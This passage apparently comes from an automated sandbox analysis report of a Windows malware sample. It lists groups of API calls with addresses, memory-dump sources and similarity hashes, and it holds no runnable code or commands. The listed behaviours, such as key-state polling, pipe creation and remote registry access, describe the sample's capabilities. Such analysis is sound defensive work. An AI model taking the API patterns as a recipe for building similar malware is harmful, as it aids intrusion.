                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                      • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                      • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                      • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                      • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                      • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                      • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                      • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                      • __swprintf.LIBCMT ref: 0046ACC1
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                      • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                      • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                      • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID: @F
                      • API String ID: 2875609808-2781531706
                      • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                      • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                      • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                      • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02F93F73,00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002), ref: 02F93FE2
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F93FF5
                      • FreeLibrary.KERNEL32(00000000,?,?,?,02F93F73,00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000), ref: 02F94018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: c6154bcbc82f0fc3746964b70a7332eda4186991a9b75c62f38639b70e2cd8ed
                      • Instruction ID: fe98cb07fa7cc6c1ae45b08084e5814ee8c224de04f3283056cf23814adb215c
                      • Opcode Fuzzy Hash: c6154bcbc82f0fc3746964b70a7332eda4186991a9b75c62f38639b70e2cd8ed
                      • Instruction Fuzzy Hash: 4BF04470E4021CBBEF119F54DC09B9EFFB5EB04795F000054E906A2160DB759A55CF90
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                      • CloseHandle.KERNEL32(?), ref: 0047EDEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                      • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                      • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                      • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                      • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                      • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                      • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                      • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                      • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      • Opcode ID: d6c5ad3fb6ca5a7530da9ebf80c1998454db4a05b27433f17472f6f9ec9ce4d2
                      • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                      • Opcode Fuzzy Hash: d6c5ad3fb6ca5a7530da9ebf80c1998454db4a05b27433f17472f6f9ec9ce4d2
                      • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                      • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                      • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                      • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                      APIs
                      • GetCursorPos.USER32(?), ref: 00402357
                      • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                      • GetAsyncKeyState.USER32(00000001), ref: 00402399
                      • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                      • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                      • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                      • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                      • TranslateMessage.USER32(?), ref: 0045645C
                      • DispatchMessageW.USER32(?), ref: 00456466
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                      • String ID:
                      • API String ID: 2108273632-0
                      • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                      • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                      • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                      • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00458A30
                      • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                      • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                      • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                      • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                      • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                      APIs
                      • IsWindowVisible.USER32(?), ref: 0045B204
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                      • _wcsstr.LIBCMT ref: 0045B289
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      • Opcode ID: f21b8a10daa1041978f1337458d9b000d4fcd72cb6c57214ff7d717bad64366e
                      • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                      • Opcode Fuzzy Hash: f21b8a10daa1041978f1337458d9b000d4fcd72cb6c57214ff7d717bad64366e
                      • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                      • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                      • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                      • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                      • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                      • __itow.LIBCMT ref: 0045936A
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                      • __itow.LIBCMT ref: 004593A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                      • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                      • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                      • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                      • SelectObject.GDI32(?,00000000), ref: 0040135C
                      • BeginPath.GDI32(?), ref: 00401373
                      • SelectObject.GDI32(?,00000000), ref: 0040139C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                      • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                      • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                      • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                      • __beginthreadex.LIBCMT ref: 00464AD8
                      • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                      • String ID:
                      • API String ID: 3824534824-0
                      • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                      • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                      • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                      • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                      APIs
                      • GetLastError.KERNEL32(00000008,?,?,02F915D8,02F93CBB,?,02F91D2A,?,?,00000000), ref: 02F918E4
                      • _free.LIBCMT ref: 02F91919
                      • _free.LIBCMT ref: 02F91940
                      • SetLastError.KERNEL32(00000000,?,02F91D2A,?,?,00000000), ref: 02F9194D
                      • SetLastError.KERNEL32(00000000,?,02F91D2A,?,?,00000000), ref: 02F91956
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: c863b998470ca2ecd3d0b5a3a8b0c92856acd0dc6d04f18acf8cc596131c552b
                      • Instruction ID: 30c223402c5ebb258c70ebc3f7ba0ffca6959356f33039bd5eb532196da5f5dd
                      • Opcode Fuzzy Hash: c863b998470ca2ecd3d0b5a3a8b0c92856acd0dc6d04f18acf8cc596131c552b
                      • Instruction Fuzzy Hash: F0012137A402073FBF1226356C88A2B321E9BC17F87100534FF0EA2251FB7388128820
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                      • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                      • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                      • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                      • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                      • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                      • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                      • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                      • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                      • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
